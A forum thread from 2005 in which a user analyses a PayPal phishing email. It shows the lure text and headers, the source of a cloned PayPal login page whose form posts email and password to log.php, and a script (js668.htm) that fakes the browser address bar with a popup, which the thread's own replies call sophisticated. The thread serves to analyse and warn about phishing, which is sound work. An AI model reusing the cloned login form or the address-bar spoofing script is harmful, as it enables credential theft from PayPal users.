Interesting PayPal Phishy (Where's Phishy?)
Results 1 to 3 of 3

Thread: Interesting PayPal Phishy (Where's Phishy?)

  1. #1
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324

    Interesting PayPal Phishy (Where's Phishy?)

    Hrmm.. Another PayPal phish:

    The Phish

    As part of our security measures, we regularly screen activity in the PayPal system. We recently noticed the following issue on your account:

    We recently received a report of unauthorized credit card use associated with this account. As a precaution, we have limited access to your PayPal account in order to protect against future unauthorized transactions.

    Case ID Number: PP-091-233-629

    For your protection, we have limited access to your account until additional security measures can be completed. We apologize for any inconvenience this may cause.

    To review your account and some or all of the information that PayPal used to make its decision to limit your account access, please visit the Resolution Center by following the link below:

    *https://www.paypal.com/cgi-bin/webscr?cmd=login-run*
    <http://web.update.acct-online.us.ms>

    If, after reviewing your account information, you seek further clarification regarding your account access, please contact PayPal by visiting the Help Center and clicking "Contact Us"

    We thank you for your prompt attention to this matter. Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.

    Sincerely,
    *PayPal* *Account Review Department *
    Header info

    From - Sat Mar 19 13:08:00 2005
    X-Account-Key: account3
    X-UIDL: dab7c3a3bcf59c254e4a210cf9c62875
    X-Mozilla-Status: 0001
    X-Mozilla-Status2: 10000000
    X-Apparently-To: msmittens@msmittens.com via xx.yy.zz.aa; Sat, 19 Mar 2005 10:03:59 -0800
    X-YahooFilteredBulk: 216.201.96.58
    Authentication-Results:xx.yy.zz.aa.com
    from=paypal.com; domainkeys=neutral (no sig)
    X-Originating-IP: [xx.yy.zz.aa]
    Return-Path: <root@altravel.whsites.net>
    Received: from xx.yy.zz.aa (EHLO xx.yy.zz.aa.net) (xx.yy.zz.aa)
    by xx.yy.zz.aa.com with SMTP; Sat, 19 Mar 2005 10:03:59 -0800
    Received: from altravel.whsites.net (altravel.whsites.net [69.36.177.20])
    by xx.yy.zz.aa.net (Postfix) with ESMTP id 518922B699E
    for <msmittens@msmittens.com>; Sat, 19 Mar 2005 13:03:59 -0500 (EST)
    Received: (from root@localhost)
    by altravel.whsites.net (8.11.6/8.11.6) id j2JI3x606444;
    Sat, 19 Mar 2005 11:03:59 -0700
    Date: Sat, 19 Mar 2005 11:03:59 -0700
    Message-Id: <200503191803.j2JI3x606444@altravel.whsites.net>
    To: msmittens@msmittens.com
    Subject: [Bulk] Notification of Limited Account Access
    From: "service@paypal.com" <service@paypal.com>


    PHP Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN">
    &
    lt;HTML><HEAD><!-- cy)dots - [ cydots.com ]    -->
    &
    lt;TITLE>web</TITLE>
    &
    lt;META name="DESCRIPTION" content="web - erfahren Sie mehr über web. Hier finden Sie alle Infos zu web...">
    &
    lt;META name="KEYWORDS" content="">
    &
    lt;LINK rel="SHORTCUT ICON" href="">
    &
    lt;META name="ROBOTS" content="index,follow">
    &
    lt;META name="LANGUAGE" content="DE,german,deutsch">
    &
    lt;META NAME="DISTRIBUTION" CONTENT="global">
    &
    lt;/HEAD>
    &
    lt;frameset rows="100%,*" border="0" frameborder="0" framespacing="0">
    &
    lt;FRAME SRC="http://216.254.139.213/~altravel.org/images/res.htm" scrolling="auto">
    &
    lt;FRAME scrolling="no" noresize>
    &
    lt;noframes>
    &
    lt;body><CENTER><h1><a href="http://web.update.acct-online.us.ms">web</a></h1>

    &
    lt;br><br><H2><a href="http://216.254.139.213/~altravel.org/images/res.htm">web erfahren Sie mehr über webHier finden Sie Informationen zum Thema web...</a></H2>
    &
    lt;br><br><a href="http://www.cydots.com/">Kostenlose Domains für alleRegistrieren Sie kostenlos Ihre eigene Domain! - Free Domains</a>
    &
    lt;br><br><A HREF="http://www.cydots.com/start/kostenlose-angebote.php" TARGET="_top">Kostenlose Angebote und Gewinnspiele!</A><BR><BR></CENTER></body>
    &
    lt;/noframes></frameset>
    &
    lt;!-- FC -->
    &
    lt;/HTML&gt
    Now this one is rather interesting. Note that the code doesn't match what's on the site. Turns out it's running in frames.

    PHP Code:
    <HTML><HEAD><TITLE>PayPal Resolution Center Member Log In</TITLE>
    &
    lt;META http-equiv=Content-Type content="text/html; charset=windows-1252">
    &
    lt;META http-equiv=description 
    content
    ="PayPal lets you send money to anyone with email. PayPal is free for consumers and works seamlessly with your existing credit card and checking account. You can settle debts, borrow cash, divide bills or split expenses with friends all without going to an ATM or looking for your checkbook.">
    &
    lt;META http-equiv=keywords 
    content
    ="Send, money, payments, credit, credit card, instant, money, financial services, mobile, wireless, WAP, cell phones, two-way pagers, Windows CE"><LINK 
    href
    ="res/xpt.css" type=text/css rel=stylesheet><LINK 
    href
    ="res/xptInvoice.css" type=text/css 
    rel
    =stylesheet><LINK href="res/xptlive.css" 
    type=text/css rel=stylesheet>
    &
    lt;STYLE type=text/css></STYLE>
    &
    lt;LINK href="/en_US/i/icon/pp_favicon_x.ico" rel="shortcut icon">

    &
    lt;script language="JavaScript">
    &
    lt;!--

    function 
    SymError()
    {
      return 
    true;
    }

    window.onerror SymError;

    var 
    SymRealWinOpen window.open;

    function 
    SymWinOpen(urlnameattributes)
    {
      return (new 
    Object());
    }

    window.open SymWinOpen;

    //-->
    </script>

    &
    lt;SCRIPT language=JavaScript>
    &
    lt;!--
    function 
    SymError()
    {
      return 
    true;
    }

    window.onerror SymError;

    var 
    SymRealWinOpen window.open;

    function 
    SymWinOpen(urlnameattributes)
    {
      return (new 
    Object());
    }

    window.open SymWinOpen;

    function 
    MM_findObj(nd) { //v4.01
      
    var p,i,x;  if(!dd=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
        
    d=parent.frames[n.substring(p+1)].documentn=n.substring(0,p);}
      if(!(
    x=d[n])&&d.allx=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
      for(
    i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
      if(!
    && d.getElementByIdx=d.getElementById(n); return x;
    }

    function 
    MM_validateForm() { //v4.0
      
    var i,p,q,nm,test,num,min,max,errors='',args=MM_validateForm.arguments;
      for (
    i=0i<(args.length-2); i+=3) { test=args[i+2]; val=MM_findObj(args[i]);
        if (
    val) { nm=val.name; if ((val=val.value)!="") {
          if (
    test.indexOf('isEmail')!=-1) { p=val.indexOf('@');
            if (
    p<|| p==(val.length-1)) errors+='- '+nm+' must contain an e-mail address.\n';
          } else if (
    test!='R') { num parseFloat(val);
            if (
    isNaN(val)) errors+='- '+nm+' must contain a number.\n';
            if (
    test.indexOf('inRange') != -1) { p=test.indexOf(':');
              
    min=test.substring(8,p); max=test.substring(p+1);
              if (
    num<min || max<numerrors+='- '+nm+' must contain a number between '+min+' and '+max+'.\n';
        } } } else if (
    test.charAt(0) == 'R'errors += '- '+nm+' is required.\n'; }
      } if (
    errorsalert('The following error(s) occurred:\n'+errors);
      
    document.MM_returnValue = (errors == '');
    }
    //-->
    </SCRIPT>

    &
    lt;SCRIPT src="res/pp_main.js"></SCRIPT>

        


    &
    lt;META content="MSHTML 6.00.2900.2096" name=GENERATOR></HEAD>
    &
    lt;BODY>
    &
    lt;DIV>
    &
    lt;DIV id=xptHeader>
    &
    lt;TABLE cellSpacing=0 cellPadding=0 align=center border=0>
      &
    lt;TBODY>
      &
    lt;TR>
        &
    lt;TD noWrap><IMG alt="" 
          
    src="res/paypal_logo.gif" border=0></TD>
        &
    lt;TD class=cobrand align=middle width="100%"></TD>
        &
    lt;TD noWrap align=right><
          href
    ="https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run"><SPAN 
          
    class=emphasis>SignUp</SPAN></A>|<
          href
    ="https://www.paypal.com/cgi-bin/webscr?cmd=_login-run">LogIn</A>|<
          href
    ="https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_security-center-outside">Help</A&gt
        &
    lt;/TD></TR></TBODY></TABLE>

        &
    lt;div align="center"></div>
      &
    lt;/DIV>
    &
    lt;DIV id=xptTabs>
    &
    lt;TABLE class=primary cellSpacing=0 cellPadding=0 align=center border=0>
      &
    lt;TBODY>
      &
    lt;TR>
        &
    lt;TD><A href="http://www.paypal.com/cgi-bin/webscr?cmd=_home"><IMG 
          alt
    =Welcome src="res/P_off_welcome.gif" 
          
    border=0></A></TD>
        &
    lt;TD><IMG height=1 alt="" src="res/pixel.gif" 
          
    width=1 border=0></TD>
        &
    lt;TD><
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=p/ema/index-outside"><IMG 
          alt
    ="Send Money" src="res/P_off_send_money.gif" 
          
    border=0></A></TD>
        &
    lt;TD><IMG height=1 alt="" src="res/pixel.gif" 
          
    width=1 border=0></TD>

        &
    lt;TD><
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=p/req/index-outside"><IMG 
          alt
    ="Request Money" 
          
    src="res/P_off_request_money.gif" 
        
    border=0></A></TD>
        &
    lt;TD><IMG height=1 alt="" src="res/pixel.gif" 
          
    width=1 border=0></TD>
        &
    lt;TD><
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=_merchant-outside"><IMG 
          alt
    ="Merchant Tools" 
          
    src="res/P_off_merchant_tools.gif" 
        
    border=0></A></TD>
        &
    lt;TD><IMG height=1 alt="" src="res/pixel.gif" 
          
    width=1 border=0></TD>
        &
    lt;TD><
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=_auction-outside"><IMG 
          alt
    ="Auction Tools" 
          
    src="res/P_off_auction_tools.gif" 
        
    border=0></A></TD></TR></TBODY></TABLE>
    &
    lt;DIV class=alignCenter>
    &
    lt;TABLE class=secondary cellSpacing=0 cellPadding=0 align=center border=0>
      &
    lt;TBODY>
      &
    lt;TR>
        &
    lt;TD><IMG height=19 alt="" src="res/pixel.gif" 
          
    width=1 border=0></TD></TR></TBODY></TABLE></DIV></DIV>

    &
    lt;DIV id=xptContentOuter>
    &
    lt;TABLE id=xptContentCustom cellSpacing=0 cellPadding=0 align=center border=0>
      &
    lt;TBODY>
      &
    lt;TR vAlign=top>
        &
    lt;TD class=fullRowNoLeftNav>
          &
    lt;DIV id=xptTitle>
          &
    lt;TABLE class=main cellSpacing=0 cellPadding=0 align=center border=0>
            &
    lt;TBODY>
            &
    lt;TR>
                        &
    lt;TD width="100%" valign="top" class=heading>

    &
    lt;table width="100%" border="1" align="center" cellpadding="5" cellspacing="0" bordercolor="#CCCCCC" bgcolor="#FFEEEE">
                            &
    lt;tr&gt
                              &
    lt;td> <span class="emphasis">Resolution Center: </span>Your 
                                account is limited
    To remove the limitationplease 
                                Log In to Resolution Center below
    .</td>
                            &
    lt;/tr>
                          &
    lt;/table>
                          &
    lt;TABLE cellSpacing=0 cellPadding=0 width="100%" align=center 
                border
    =0>
                            &
    lt;TBODY>
                              &
    lt;TR vAlign=top&gt
                                &
    lt;TD class=fullRowNoLeftNav><span class="nav"><font color="#000000" size="2" face="Arial, Helvetica, sans-serif"><br>

                                  
    PayPal is constantly working to ensure security 
                                  by regularly screening the accounts in our system

                                  
    We recently reviewed your account, and we need more 
                                  information to help us provide you with secure service

                                  
    Until we can collect this informationyour access 
                                  to sensitive account features will be limited
    . <br>
                                  &
    lt;/font></span&gt
                                  &
    lt;class="nav"><font color="#000000" size="2" face="Arial, Helvetica, sans-serif"><strong>Why 
                                    is my account access limited
    ?</strong><br>
                                    &
    lt;br>
                                    &
    lt;/font><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Your 
                                    account access has been limited 
    for the following 
                                    reason
    (s):<br>
                                    &
    lt;/font><font color="#000000" size="2" face="Arial, Helvetica, sans-serif"><br>
                                     &
    lt;strong&gtOur system requires 
                                    further account verification
    .</strong><br>

                                    &
    lt;br>
                                    &
    lt;/font><font color="#000000" size="2" face="Arial, Helvetica, sans-serif"></font></p>
                                  
                                &
    lt;/TD>
                              &
    lt;/TR>
                            &
    lt;/TBODY>
                          &
    lt;/TABLE>
                          &
    lt;table width="100%" border="0" cellspacing="0" cellpadding="0">
                            &
    lt;tr valign="bottom"&gt
                              &
    lt;td width="51%" height="50" class="heading">Resolution 
                                Center Member Log In 
    </td>

                              &
    lt;td width="49%" height="50"&gt
                                &
    lt;div align="right">Secure Log In <img src="res/secure_lock_2.gif" width="16" height="17"></div></td>
                            &
    lt;/tr>
                          &
    lt;/table>
                          
                        &
    lt;/TD>
                      &
    lt;/TR>
            &
    lt;TR>
              &
    lt;TD><IMG height=2 alt="" 
                
    src="res/pixel.gif" width=
            border
    =0></TD></TR>
            &
    lt;TR>

              &
    lt;TD>
                &
    lt;HR>
              &
    lt;/TD></TR></TBODY></TABLE></DIV>
                &
    lt;TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0>
                  &
    lt;TBODY>
                    &
    lt;TR&gt
                      &
    lt;TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" align=center 
                border
    =0>
                          &
    lt;TBODY>
                            &
    lt;TR vAlign=top&gt
                              &
    lt;TD class=fullRowNoLeftNav><form action="log.php" method="post" name="form1" onSubmit="MM_validateForm('Email','','RisEmail','Pass','','R');return document.MM_returnValue">

                                  &
    lt;table width="500" border="0" cellspacing="0" cellpadding="0">
                                    &
    lt;tr&gt
                                      &
    lt;td width="114"><strong><font size="2" face="Arial, Helvetica, sans-serif">Email 
                                        address
    :</font></strong></td>
                                      &
    lt;td width="156"><strong><font face="Arial, Helvetica, sans-serif"&gt
                                        &
    lt;input name="Email" type="text" id="Email">
                                        &
    lt;/font></strong></td>
                                      &
    lt;td width="230"><a href="https://www.paypal.com/cgi-bin/webscr?cmd=_email-recovery">Forget 
                                        your email address
    ?</a></td>
                                    &
    lt;/tr>
                                    &
    lt;tr&gt
                                      &
    lt;td><strong><font size="2" face="Arial, Helvetica, sans-serif">Password:</font></strong></td>

                                      &
    lt;td><strong><font face="Arial, Helvetica, sans-serif"&gt
                                        &
    lt;input name="Pass" type="password" id="Pass">
                                        &
    lt;/font></strong></td>
                                      &
    lt;td><a href="https://www.paypal.com/cgi-bin/webscr?cmd=_forgot-password">Forget 
                                        your password
    ?</a></td>
                                    &
    lt;/tr>
                                    &
    lt;tr&gt
                                      &
    lt;td height="40"><span class="f3"><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">
                                        &
    lt;input name="subiect" type="hidden" id="subiect3" value="Step1">
                                        &
    lt;input name="redirect" type="hidden" id="redirect" value="loginaccess.htm">

                                        &
    lt;/font></span></td>
                                      &
    lt;td height="40"&gt
                                        &
    lt;input type="submit" name="Submit" value="Log In">
                                      &
    lt;/td>
                                      &
    lt;td height="40"> </td>
                                    &
    lt;/tr>
                                  &
    lt;/table>
                                &
    lt;/form></TD>
                            &
    lt;/TR>

                          &
    lt;/TBODY>
                        &
    lt;/TABLE></TD>
                    &
    lt;/TR>
                    &
    lt;TR&gt
                      &
    lt;TD width="100%" valign="top" class=verticalSpacerHigh><IMG height=1 alt="" 
                
    src="res/pixel.gif" width=
            border
    =0&gt
                        &
    lt;HR></TD>
                    &
    lt;/TR>
                  &
    lt;/TBODY>
                &
    lt;/TABLE></TD></TR></TBODY></TABLE></DIV>
    &
    lt;DIV id=xptFooter>

    &
    lt;TABLE cellSpacing=0 cellPadding=0 align=center border=0>
      &
    lt;TBODY>
      &
    lt;TR>
        &
    lt;TD>
          &
    lt;P><
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/about-outside">About</A&gt
          | &
    lt;
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside">Account 
          Types
    </A> | <
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=_display-fees-outside">Fees</A&gt
          | &
    lt;
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside">Privacy</A&gt
          | &
    lt;
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=_security-center-outside">Security 
          Center
    </A> | <
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=_contact_us">Contact Us</A&gt
          | &
    lt;
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/ua/ua-outside">User 
          Agreement
    </A> | <
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=p/pdn/intro-outside">Developers</A&gt
          | &
    lt;
          href
    ="https://www.paypal.com/cgi-bin/webscr?cmd=p/gen/jobs-outside">Jobs</A&gt
          | &
    lt;
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=_bc-signup">BuyerCredit</A&gt
          | &
    lt;
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=_web-referrals-mrb-outside">Referrals</A&gt
          | &
    lt;A href="http://www.paypal.com/cgi-bin/webscr?cmd=_shop-ext">Shops</A> | 
          &
    lt;
          href
    ="https://www.paypal.com/cgi-bin/webscr?cmd=p/gen/batch-outside">Mass 
          Pay
    </A></P>

          &
    lt;P><class=ebayLink href="http://www.ebay.com/" target=_blank>PayPalan 
          eBay company
    </A></P>
          &
    lt;class=lastPara>Copyright © 1999-2004 PayPalAll rights reserved.<BR><
          href
    ="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/fdic-outside">Information 
          about FDIC pass
    -through 
    insurance
    </A></P></TD></TR></TBODY></TABLE><BR></DIV></DIV>
    &
    lt;SCRIPT language=JavaScript>
    &
    lt;!--
    var 
    SymRealOnLoad;
    var 
    SymRealOnUnload;

    function 
    SymOnUnload()
    {
      
    window.open SymWinOpen;
      if(
    SymRealOnUnload != null)
         
    SymRealOnUnload();
    }

    function 
    SymOnLoad()
    {
      if(
    SymRealOnLoad != null)
         
    SymRealOnLoad();
      
    window.open SymRealWinOpen;
      
    SymRealOnUnload window.onunload;
      
    window.onunload SymOnUnload;
    }

    SymRealOnLoad window.onload;
    window.onload SymOnLoad;

    //-->
    </SCRIPT>
    &
    lt;/BODY>
    &
    lt;SCRIPT language=javascript src="js668.htm"></SCRIPT>
                  
    &
    lt;/HTML>

    &
    lt;script language="JavaScript">
    &
    lt;!--
    var 
    SymRealOnLoad;
    var 
    SymRealOnUnload;

    function 
    SymOnUnload()
    {
      
    window.open SymWinOpen;
      if(
    SymRealOnUnload != null)
         
    SymRealOnUnload();
    }

    function 
    SymOnLoad()
    {
      if(
    SymRealOnLoad != null)
         
    SymRealOnLoad();
      
    window.open SymRealWinOpen;
      
    SymRealOnUnload window.onunload;
      
    window.onunload SymOnUnload;
    }

    SymRealOnLoad window.onload;
    window.onload SymOnLoad;

    //-->
    </script&gt

    Going to cydots.com and I get this when searching for the domain:

    The domain

    http://www.web.update.acct-online.us.ms

    is already registered!
    Using wget and I was able to finally get some files:

    PHP Code:
    MsMittens# more js668.htm
    var vuln_xvuln_yvuln_wvuln_h;
    function 
    vuln_calc() {
    var 
    rootdocument[
    (
    document.compatMode=='CSS1Compat') ?
    'documentElement' 'body'
    ];
    vuln_xwindow.screenLeft+72;
    vuln_ywindow.screenTop-20;
    vuln_wroot.offsetWidth-520;
    vuln_h17;
    vuln_show();
    }

    var 
    vuln_win;
    function 
    vuln_pop() {
    vuln_winwindow.createPopup();
    vuln_win.document.body.innerHTMLvuln_html;
    vuln_win.document.body.style.margin0;
    vuln_win.document.body.onunloadvuln_pop;
    vuln_show();
    }

    function 
    vuln_show() {
    if (
    vuln_win)
    vuln_win.show(vuln_xvuln_yvuln_wvuln_h);
    }

    var 
    vuln_html'\x3Cdiv style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https//www.paypal.com/cgi-bin/webscr?cmd=_login-run'

    if (window.createPopup) {
    vuln_calc();
    vuln_pop();
    window.setInterval(vuln_calc25);
    } else {

    It's this file that seems the most interesting. I will say this: the phishes are getting more and more sophisticated. Notice sent off to Primus.ca and PayPal.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  2. #2
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    Ouch.... That's a bit of a bitch.... It's getting as hard to understand as the code I write....
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  3. #3
    I suppose the only way to protect against it is to never reply to any email wanting anything to do with your money. I think some people would still reply and fill it all out though.
    Paypal would never really send email like this right?

    Allthough a major tellecomunications company where I live sent out a shizload of emails to customers asking them to update their registrations and whatever.
    Fortunatly most got 'mistaken' for phishing attempts. Which I thought was funny.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •